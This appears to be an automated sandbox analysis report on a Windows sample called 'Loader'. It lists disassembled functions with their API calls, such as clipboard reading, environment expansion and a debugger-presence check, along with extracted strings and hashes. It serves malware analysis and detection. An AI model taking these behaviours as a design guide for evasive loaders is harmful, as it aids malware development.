Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
Instruction ID: f90848bae3256b06cf5094926935a10db3a74c04a44cfe7e493f6f0e12b6a334
Opcode Fuzzy Hash: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
Instruction Fuzzy Hash: 85D0C931465622EBC6146F18BC15BC73A54DF4A361F0708A2F4006A475C675DC91DAE8

Function 0043BD20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00408638,?,00408638), ref: 0043BD30

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
Instruction ID: 2c7a29268eac836babc22c216ba9330a039660881ad4ae188c8b4a1fbc13fc40
Opcode Fuzzy Hash: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
Instruction Fuzzy Hash: 40C09B31455321EBC6106B15FC05FC77F54DF49751F1140A6B00477072C771AC41C6D8

Non-executed Functions

Function 00433500 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 121clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433514
GetClipboardData.USER32 ref: 0043352F
GlobalLock.KERNEL32 ref: 00433548
GetWindowLongW.USER32 ref: 004335AE
GlobalUnlock.KERNEL32 ref: 00433681
CloseClipboard.USER32 ref: 0043368A

Strings

Q, xrefs: 004335EC
j, xrefs: 004335E7
q, xrefs: 004335C9
x, xrefs: 004335D3
e, xrefs: 004335DD
], xrefs: 004335BF

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: Q$]$e$j$q$x
API String ID: 2832541153-692368135
Opcode ID: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
Instruction ID: 6f1dbd0e63c0454490a30a8cba9f540b8e981e08c188719af7d206ff943662a7
Opcode Fuzzy Hash: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
Instruction Fuzzy Hash: 9B41927150C7418ED310AF78988935FBFE0AB9A315F044A3EE4D5873D2D6788649C75B

Function 00426FD0 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 306COMMON

Download Yara Rule

Strings

KJIH, xrefs: 00427214
3SQm, xrefs: 004272A6
rqB, xrefs: 00427165
xlc=, xrefs: 00427190
1G#A, xrefs: 0042727E
#C(], xrefs: 00427286
o;i, xrefs: 004272AE

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: o;i$#C(]$1G#A$3SQm$KJIH$rqB$xlc=
API String ID: 0-4225912290
Opcode ID: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
Instruction ID: 99384cb80079416eac910717a9e1d0dd8795ebf962f0defd3915704c1b902f09
Opcode Fuzzy Hash: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
Instruction Fuzzy Hash: 06914876A0C3248BC320DF64E88165FB7E1EBC9704F59493EE98997341DB74AD058BCA

Function 00419190 Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1209COMMON

Download Yara Rule

APIs

Part of subcall function 0043DA10: LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E

FreeLibrary.KERNEL32(?), ref: 00419706
FreeLibrary.KERNEL32(?), ref: 0041976B

Strings

HS, xrefs: 004195B6
#v, xrefs: 00419706, 0041976B
X{, xrefs: 004195AE
056w, xrefs: 004198C4
wB, xrefs: 004195C6

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: 056w$HS$X{$wB$#v
API String ID: 764372645-92669455
Opcode ID: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
Instruction ID: 5228fd0e467c720768e27c90b66e3c9c54d982958b1791ede40bd78fdaf92bff
Opcode Fuzzy Hash: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
Instruction Fuzzy Hash: B0821B746483406BE724CF24D8A076BBBE1EBD6714F28892DE0D5473A1D379DC82CB5A

Function 00EC8D90 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

"t, xrefs: 00EC8DAE, 00EC8F46, 00EC9111, 00EC9166
"t, xrefs: 00EC91F1, 00EC8FE0

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID: "t$"t
API String ID: 0-1451024413
Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
Instruction ID: b4c3dd1bf09823f08aeb12bbd8437f8bff72997974d1d928771d8ded679ca4a1
Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
Instruction Fuzzy Hash: DF023B71E012199BDB14CFA9DA84BAEBBF1FF48314F15826DD515B7341D732A902CB90

Function 00418241 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 419COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418272

Strings

o, xrefs: 0041898B
<9, xrefs: 0041835B
L, xrefs: 0041836B

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: <9$L$o
API String ID: 237503144-3122339205
Opcode ID: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
Instruction ID: 38d06cfc946e2d634f33bc898b8b3081b8a665a97a1976fa3bc9cb3ab81d6238
Opcode Fuzzy Hash: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
Instruction Fuzzy Hash: F6E14B756083528BD320CF29D8D07ABB7E1EF99324F188A3DE4C487391EB789945CB56

Function 00417EEE Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 287COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,59195F3A,00000000,00000000,?), ref: 004181F4

Strings

7imJ, xrefs: 00417F7B
!C-M, xrefs: 004180FA
}Y*[, xrefs: 00417FC2
qWs, xrefs: 00417F66
M+O, xrefs: 00417F5E

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M+O$!C-M$7imJ$}Y*[$qWs
API String ID: 237503144-2509796657
Opcode ID: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
Instruction ID: 249fc3654da106cc027156d5fad6694f65c71858bdaf82a4f9d6bcb215be2f5f
Opcode Fuzzy Hash: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
Instruction Fuzzy Hash: 3F9116716183128BC324CF14C4916BBB7F1EFC9764F199A1EE5CA5B361E7389881C74A

Function 00ED0062 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(00000000,?,00ECD392,?,?,?,00000000), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 00ECB059

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00ED016A
IsValidCodePage.KERNEL32(00000000), ref: 00ED01A8
IsValidLocale.KERNEL32(?,00000001), ref: 00ED01BB
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00ED0203
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00ED021E

Strings

`/, xrefs: 00ED0117

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: `/
API String ID: 415426439-3547518435
Opcode ID: 2ff4dfa057c28536daa41cbf22eaa9fe3649a490d9f03648220dc6dde5ac8d6f
Instruction ID: 148a8f32efa4d5867bbaf36c30e5e925a99ca7aa07c952a1d3623a04d7f5ca7d
Opcode Fuzzy Hash: 2ff4dfa057c28536daa41cbf22eaa9fe3649a490d9f03648220dc6dde5ac8d6f
Instruction Fuzzy Hash: 64517071A01209AFDB10DFA5DC45BBA77F8EF54714F08142AF905FB2A1E7B0DA068B61

Function 0042856C Relevance: 9.3, Strings: 7, Instructions: 519COMMON

Download Yara Rule

Strings

xlc=, xrefs: 00428938
TU, xrefs: 004287CE
hi, xrefs: 004286FE
KJIH, xrefs: 004289B5
#z*>, xrefs: 004287D5
M`af, xrefs: 004288BE, 004288CB
M`af, xrefs: 004287DA, 00428846

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
API String ID: 0-3444116175
Opcode ID: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
Instruction ID: 7e836b9766b242f3fc3dd51180be0f2cab443d7991a9e66097dbc5a85011b6e9
Opcode Fuzzy Hash: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
Instruction Fuzzy Hash: 0BD14775609321CBC3149F18D85166FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A

Function 00428630 Relevance: 9.3, Strings: 7, Instructions: 514COMMON

Download Yara Rule

Strings

xlc=, xrefs: 00428938
TU, xrefs: 004287CE
hi, xrefs: 004286FE
KJIH, xrefs: 004289B5
#z*>, xrefs: 004287D5
M`af, xrefs: 004288BE, 004288CB
M`af, xrefs: 004287DA, 00428846

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
API String ID: 0-3444116175
Opcode ID: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
Instruction ID: f976bc588ec640565c7012468651d5ffc8b69fa3d08ac8f64f271550ea2c12cc
Opcode Fuzzy Hash: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
Instruction Fuzzy Hash: ADD13675609321CBC3149F18D85266FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A

Function 004257AC Relevance: 9.3, Strings: 7, Instructions: 503COMMON

Download Yara Rule

Strings

tz, xrefs: 00425824
KJIH, xrefs: 00425D12
xlc=, xrefs: 00425D67
xlc=, xrefs: 00425C9A
KJIH, xrefs: 00425A65
xlc=, xrefs: 004259E5
x~, xrefs: 0042582C

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH$KJIH$xlc=$xlc=$xlc=$tz$x~
API String ID: 0-1340891752
Opcode ID: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
Instruction ID: 4b9b57266fa6f88c6c86b47bd8eb3fb309f79ef555365d41f88ab1d7a07e1ec3
Opcode Fuzzy Hash: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
Instruction Fuzzy Hash: 77F16579A0C350DFD3248F55E88172BBBE1FBCA314F95482DEA859B351D7749802CB8A

Function 00426430 Relevance: 9.1, Strings: 7, Instructions: 396COMMON

Download Yara Rule

Strings

SDTB, xrefs: 004270A2
no, xrefs: 00426DE7
DTS^, xrefs: 004270C3
xlc=, xrefs: 00427190
WLTO, xrefs: 004270D9
BC, xrefs: 00426EE5
sNDW, xrefs: 004270F5

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: BC$DTS^$SDTB$WLTO$no$sNDW$xlc=
API String ID: 0-4261215005
Opcode ID: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
Instruction ID: bc51c2f3923f1d1749b79aa7f72e467a3002caf565e53d3967ace05a6b2d116c
Opcode Fuzzy Hash: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
Instruction Fuzzy Hash: F3D1F0B5A0C3908FD7309F24E8917ABB7F1EB96304F45482DE5C99B252DB748905CB8B

Function 00429070 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429149

Strings

~Pf?, xrefs: 004291BD
zPf?, xrefs: 00429157

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: zPf?$~Pf?
API String ID: 237503144-2637493059
Opcode ID: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
Instruction ID: 198dd5e36b7fe1fa964ce911b4fb16a36b701d1aa9f0cceef3b71a0ea0f726ca
Opcode Fuzzy Hash: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
Instruction Fuzzy Hash: EB514675648305EFE3108F25AC81B6BB7A8FBC2704F50193DFA509B291DBB4D81ACB56

Function 00ED07C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0860
GetLocaleInfoW.KERNEL32(?,20001004,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0889
GetACP.KERNEL32(?,?,00ED0198,?,00000000), ref: 00ED089E

Strings

ACP, xrefs: 00ED07E5
OCP, xrefs: 00ED081B

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
Instruction ID: b1ec24fbffcb299ffdf07978b1a6e6e05714fb3850e8383180ebe8bf3a48851d
Opcode Fuzzy Hash: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
Instruction Fuzzy Hash: CB21F92AA001449ADB388B55C94179773A6EF90B68F5E9026E80AF7310E731DD42E3D0

Function 0041D5B0 Relevance: 8.5, Strings: 6, Instructions: 1030COMMON

Download Yara Rule

Strings

J_\e, xrefs: 0041D969
+, xrefs: 0041DD87
wJsU, xrefs: 0041D938
JSQC, xrefs: 0041D974
klSm, xrefs: 0041D930
iWDB, xrefs: 0041D948

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: +$JSQC$J_\e$iWDB$klSm$wJsU
API String ID: 0-48882314
Opcode ID: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
Instruction ID: 6539de25e02be62e166c2d6d1fbf72afe4b3ae9106669352150e090de26398d0
Opcode Fuzzy Hash: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
Instruction Fuzzy Hash: 1B72597090C3518FC725CF29C8406AFBBE1AF95314F188A6EE8E58B392D738D946C756

Function 0041B9A0 Relevance: 6.8, Strings: 5, Instructions: 597COMMON

Download Yara Rule

Strings

>j%h, xrefs: 0041BF90
C@, xrefs: 0041BC38
IG, xrefs: 0041BB2B
w, xrefs: 0041BB33
YF, xrefs: 0041BF7A

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: >j%h$C@$IG$YF$w
API String ID: 0-3977256543
Opcode ID: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
Instruction ID: bddec1b54a39677e85b17c04ceb6ad18fd944dcb43d24b0713774ccf1a2472f2
Opcode Fuzzy Hash: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
Instruction Fuzzy Hash: A302107260C3408BD704DF69C8516ABFBE2EFD6314F09882DE4D58B392E7389545CB9A

Function 00ED0DA9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a101d9e28bf9309cddbdeecfe26bf0a4b252fe11af48f1311c9dbd0014bd6e72
Instruction ID: 22a29920c7d53a93da275ec8971d224237e2b005441335659cc7492cde7e7ec4
Opcode Fuzzy Hash: a101d9e28bf9309cddbdeecfe26bf0a4b252fe11af48f1311c9dbd0014bd6e72
Instruction Fuzzy Hash: 0C71D27194515C6FDF30AF24CC89BAEBBB9EB05308F1851DAE409B7351EA315E868F10

Function 00EBE42C Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EBE438
IsDebuggerPresent.KERNEL32 ref: 00EBE504
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EBE51D
UnhandledExceptionFilter.KERNEL32(?), ref: 00EBE527

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c7c5dcb862a7604ac853d15e64c1ba68deff79a79bc0f9f2e651e07b1cbf7bf0
Instruction ID: bf2f94e5c44a02140c404377765d91ba14535ab9a097f871884b37a7e6de7f12
Opcode Fuzzy Hash: c7c5dcb862a7604ac853d15e64c1ba68deff79a79bc0f9f2e651e07b1cbf7bf0
Instruction Fuzzy Hash: 3731D8B5D0121C9BDB21DFA5D9897CDBBF8AF08304F1041EAE40DAB250EB759A85CF45

Function 00417207 Relevance: 5.4, Strings: 4, Instructions: 423COMMON

Download Yara Rule

Strings

L4, xrefs: 00417600
L4, xrefs: 004172E0
3wA, xrefs: 00417515, 0041772D
Oslm, xrefs: 00417589

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: 3wA$Oslm$L4$L4
API String ID: 2994545307-2234767502
Opcode ID: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
Instruction ID: 307d0b6bb99e80c2126adcaddeb59da55b998df86b0f55e95dd8da5ebd5bfe2f
Opcode Fuzzy Hash: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
Instruction Fuzzy Hash: BFD147716083419FD724CF28C8817ABB7E2ABC6314F188A3DE4D983392D735D856CB86

Function 00415506 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

WT, xrefs: 004155E0
7, xrefs: 00415649
gfff, xrefs: 00415694

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 7$WT$gfff
API String ID: 0-3918836065
Opcode ID: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
Instruction ID: b46a7ac6f51d3cab31650695944aba32df2089761ef6db5e6300506385caa733
Opcode Fuzzy Hash: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
Instruction Fuzzy Hash: D8A13A73A106008FD318CA29CC517FBB7D3ABC5324F1AC63ED456CB2D9EA3898468785

Function 0041A3A0 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

Ju, xrefs: 0041A428
tu, xrefs: 0041A438
w~, xrefs: 0041A430

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: Ju$tu$w~
API String ID: 0-2718015323
Opcode ID: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
Instruction ID: 3c52c23171b1d345c2d49e998851337e4974a2c3d886fd1ac3d2f2ae50b48a00
Opcode Fuzzy Hash: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
Instruction Fuzzy Hash: 6F41AA700093918BC724CF29C8606BBBBE0EF83364F04495DE5D28B291E3BD9945CB97

Function 0042963E Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

KJIH, xrefs: 004296D0
xlc=, xrefs: 00429737
xlc=, xrefs: 00429656

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH$xlc=$xlc=
API String ID: 0-3693430147
Opcode ID: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
Instruction ID: 1df2b0cd354e5eb9382eacdd7d6201147e9d1f654fc09427a9397325319c904e
Opcode Fuzzy Hash: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
Instruction Fuzzy Hash: 4441F53AB69724DBC7289F59ECC152AF7E1EB99710F84543ED982DB311C728DC01878A

Function 00426639 Relevance: 3.1, Strings: 2, Instructions: 613COMMON

Download Yara Rule

Strings

kim}, xrefs: 00426689
@gB, xrefs: 00426820, 00426B5F

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

